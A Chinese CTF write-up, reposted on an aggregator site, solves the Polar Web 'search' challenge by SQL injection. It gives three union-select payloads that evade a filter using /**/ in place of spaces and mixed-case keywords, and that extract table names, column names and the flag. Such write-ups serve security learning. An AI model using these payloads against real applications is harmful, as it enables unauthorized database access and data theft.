Polar Web【中等】search

Polar Web【中等】search

Contents

  • Polar Web【中等】search
    • 思路&探索
      • 首页
      • 一般注入方式
    • EXP&效果
      • Payload
    • 总结

思路&探索

见到题目标题,预测可能有目录扫描或者输入框查询数据之类情况,具体细节在破解过程中才能清楚

  1. 打开站点,显示为输入框查询功能界面,尝试输入上传数字 1、2...、10 均会返回用户信息,于是考虑到存在SQL注入
  2. 尝试使用单引号闭合接 union 语句,提示被拦截,可确定存在 SQL注入,故需要考虑对其做绕过处理
  3. 测试发现,需要进行 空格绕过 以及 大写绕过,具体 Payload 详见后文
  • 根据回显信息逐层构造 Payload 查询后,获取 flag(本文采用手动注入的方式,尚无脚本)

首页

index

一般注入方式

在这里插入图片描述

EXP&效果

Payload

# 获取表名
1'/**/Union/**/Select/**/1,group_concat(table_name),3,4,5/**/From/**/information_schema.tables/**/Where/**/table_schema=database()#

1

# 获取字段名
1'/**/Union/**/Select/**/1,group_concat(column_name),3,4,5/**/From/**/information_schema.columns/**/Where/**/table _schema=database()/**/and/**/table_name="Flag"#

2

# 获取指定字段值 —— Flag
1'/**/Union/**/Select/**/1,group_concat(Flag),3,4,5/**/From/**/Flag#

3

总结

  • 本题考查的是 SQL注入漏洞的渗透技巧,其中涉及到:
    • 空格绕过 —— /**/
    • 大写绕过 —— Union Select ...







敬,不完美的明天

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/25316.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python记录之集合

python记录之集合

Python中的集合(Set)是一个无序且不包含重复元素的数据结构。集合主要用于成员检测和数据去重。 1. 集合的创建 在Python中,你可以使用大括号{}或set()函数来创建一个集合。注意,如果你使用大括号{}并且只包含一个元素&#xff…
阅读更多...
如何下载BarTender软件及详细安装步骤

如何下载BarTender软件及详细安装步骤

BarTender是美国海鸥科技推出的一款优秀的条码打印软件,应用于 WINDOWS95 、 98 、 NT 、 XP 、 2000 、 2003 和 3.1 版本, 产品支持广泛的条形码码制和条形码打印机, 不但支持条形码打印机而且支持激光打印机,还为世界知名品牌条…
阅读更多...
使用Spring Boot设计一套BI系统

使用Spring Boot设计一套BI系统

商业智能(Business Intelligence,简称BI)系统是一种将数据转化为可操作信息,帮助企业进行决策支持的技术与工具的集合。随着大数据时代的到来,BI系统在企业中的应用变得越来越广泛。本文旨在探讨如何使用Spring Boot框…
阅读更多...
前端-a-date-picker如何设置禁选时间段

前端-a-date-picker如何设置禁选时间段

想要做到如图所示的效果&#xff0c;代码如下&#xff1a; 第一个是只能选择某一天&#xff0c;第二个是只能选择某一个时间段 <a-date-pickerv-model:value"record.onTimeStr":show-time"{ format: HH:mm }"valueFormat"YYYY-MM-DD HH:mm:ss&qu…
阅读更多...
【RAG入门教程02】Langchian的Embedding介绍与使用

【RAG入门教程02】Langchian的Embedding介绍与使用

Embedding介绍 词向量是 NLP 中的一种表示形式&#xff0c;其中词汇表中的单词或短语被映射到实数向量。它们用于捕获高维空间中单词之间的语义和句法相似性。 在词嵌入的背景下&#xff0c;我们可以将单词表示为高维空间中的向量&#xff0c;其中每个维度对应一个特定的特征…
阅读更多...
mm-qcamera-daemon主函数分析

mm-qcamera-daemon主函数分析

目录 main函数核心 main函数核心 main函数的主要任务包含在一个do{ } while(1)循环中. while循环中主要是监听文件描述符,故mai函数是由文件的读写来进行驱动的。 所有的文件描述符被封装成结构体 read_fd_info_t.其定义如下&#xff1a; /** read_fd_info_t* type -- either …
阅读更多...
拯救者Legion Y9000X IRX9 2024(83FD)原装出厂Windows11系统镜像下载

拯救者Legion Y9000X IRX9 2024(83FD)原装出厂Windows11系统镜像下载

lenovo联想2024款拯救者Y9000X IRX9 笔记本电脑【83FD】OEM预装Win11系统安装包&#xff0c;恢复开箱状态&#xff0c;自带恢复重置还原功能 链接&#xff1a;https://pan.baidu.com/s/1i_sVcnXF4qgsuj02rebe-Q?pwdyefp 提取码&#xff1a;yefp 联想原装WIN11系统自带所有…
阅读更多...
Vue2学习(04)

Vue2学习(04)

目录 一、组件的三大组成部分 二、组件的样式冲突scoped 三、scoped原理 ​编辑 四、data是一个函数 五、组件通信 1.概念&#xff1a;是指组件与组件之间的数据传递&#xff0c;组件的数据是独立的&#xff0c;无法直接访问其他组件的数据&#xff0c;想用其他组件的数…
阅读更多...
Pycharm中import torch报错解决方案(Python+Pycharm+Pytorch cpu版)

Pycharm中import torch报错解决方案(Python+Pycharm+Pytorch cpu版)

pycharm环境搭建完毕后&#xff0c;编写一个py文件demo&#xff0c;import torch报错&#xff0c;提示没有。设置python解释器&#xff1a; 选择conda环境&#xff0c;使用现有环境&#xff0c;conda执行文件找到Anaconda安装路径下Scripts文件夹内的conda.exe&#xff0c;最后…
阅读更多...
【Java SE】字符串常量池详解,什么情况下字符串String对象存在常量池,通过==进行判断,字符串创建及截取后是否同一个对象

【Java SE】字符串常量池详解,什么情况下字符串String对象存在常量池,通过==进行判断,字符串创建及截取后是否同一个对象

复习字符串创建方式 字符串的31种构造方法 public String();创建一个空白字符串&#xff0c; 不含有任何内容public String(char[] array);根据字符数组的内容&#xff0c;来创建对应的字符串public String(byte[] array);根据字节数组的内筒&#xff0c;来创建对应的字符串 …
阅读更多...
Docker:在DockerHub上创建私有仓库

Docker:在DockerHub上创建私有仓库

文章目录 Busybox创建仓库推送镜像到仓库 本篇开始要学习在DockerHub上搭建一个自己的私有仓库 Busybox Busybox是一个集成了三百多个最常用Linux命令和工具的软件&#xff0c;BusyBox包含了很多工具&#xff0c;这里拉取该镜像推送到仓库中&#xff1a; 安装 apt install …
阅读更多...
Web前端轨迹追踪:深入探索与解析

Web前端轨迹追踪:深入探索与解析

Web前端轨迹追踪&#xff1a;深入探索与解析 在数字化时代的浪潮中&#xff0c;Web前端作为用户与互联网世界交互的桥梁&#xff0c;承载着丰富的信息和交互体验。而轨迹追踪&#xff0c;作为前端开发中不可或缺的一环&#xff0c;对于提升用户体验、优化产品性能以及实现精准…
阅读更多...
leetcode(力扣)第15题-三数之和---使用c语言双指针法,二级指针的应用

leetcode(力扣)第15题-三数之和---使用c语言双指针法,二级指针的应用

题目&#xff1a; 15. 三数之和 - 力扣&#xff08;LeetCode&#xff09; 编写过程的问题&#xff1a; 记住线索 1、对数组使用快排排序&#xff1b;2、固定 a 对 b、c 使用双指针&#xff1b;3、注意去重问题。函数返回值的类型。{1&#xff0c;2&#xff0c;-3}。结果作为…
阅读更多...
2024.6.9 二

2024.6.9 二

Python类的继承 class 子类(父类1,父类2,…) 子类继承父类的和方法,即如果什么都不改,就相当于父类改了个名字接着用 构造函数继承与改写 当在Python中出现继承的情况时&#xff0c;一定要注意初始化函数_init_的行为&#xff1a; 如果子类没有定义自己的初始化函数&#xf…
阅读更多...
如何获取当前dll或exe模块所在路径?

如何获取当前dll或exe模块所在路径?

有时我们需要在当前运行的dll或exe模块中去动态加载当前模块同路径中的另一个库&#xff0c;或者启动当前模块同路径中的另一个exe程序&#xff0c;一般需要获取当前模块的路径&#xff0c;然后去构造同路径下目标模块的绝对路径&#xff0c;然后通过该绝对路径去加载或启动该目…
阅读更多...
高速USB转串口芯片CH343

高速USB转串口芯片CH343

CH343封装 截止目前&#xff0c;主要封装有 SOP16: CH343G QFN16: CH343P ESSOP10: CH343K,截止24年6月未生产 CH343串口速度 最高串口速度&#xff1a; 6Mbps,比CH340的2M&#xff0c;快3倍 1、概述 参考版本&#xff1a;1E CH343 是一个 USB 总线的转接芯片&#xff0c;…
阅读更多...
使用ORM Bee时, Condition, SuidRich的方法中, 字段是否支持使用Orders::getName的形式,避免使用静态字段串写死字段值

使用ORM Bee时, Condition, SuidRich的方法中, 字段是否支持使用Orders::getName的形式,避免使用静态字段串写死字段值

使用ORM Bee时, Condition, SuidRich的方法中, 字段是否支持使用Orders::getName的形式,避免使用静态字段串写死字段值. 可以使用V2.4.0 的ConditionExt和SuidRichExt 需要引用BeeExt. 示例代码如下: package org.teasoft.exam.bee.osql.ext24;import org.teasoft.bee.osql…
阅读更多...
Yolov9比其他yolo版本的改进

Yolov9比其他yolo版本的改进

YOLOv9模型在多个方面进行了改进&#xff0c;根据搜索结果&#xff0c;以下是一些主要的改进点&#xff1a; 1. **可逆函数角度的分析**&#xff1a;YOLOv9从可逆函数的角度理论上分析了现有的CNN架构&#xff0c;基于这种分析&#xff0c;设计了PGI&#xff08;可编程梯度信息…
阅读更多...
4、Spring之Bean生命周期~获取Bean

4、Spring之Bean生命周期~获取Bean

4、Spring之Bean生命周期~获取Bean 获取BeantransformedBeanName()方法BeanFactoryUtils的transformedBeanName方法canonicalName()方法 getObjectForBeanInstance()方法getObjectFromFactoryBean()方法 获取Bean Spring Bean的生命周期首先会经过扫描&#xff0c;然后回经过合…
阅读更多...
git本地配置及IDEA下Git合并部分文件

git本地配置及IDEA下Git合并部分文件

目录 1、IDEA 下 Git 合并部分文件 2、分支合并忽略特定文件步骤 3、git本地配置 1、IDEA 下 Git 合并部分文件 1.1Git 下存在两个分支&#xff0c;foo 和 bar 分支&#xff0c;想要把 bar 分支上的部分文件合并到 foo 分支: 首先切换到 foo 分支&#xff0c;点击右下角的 …
阅读更多...
最新文章

Copyright @ 2022~2023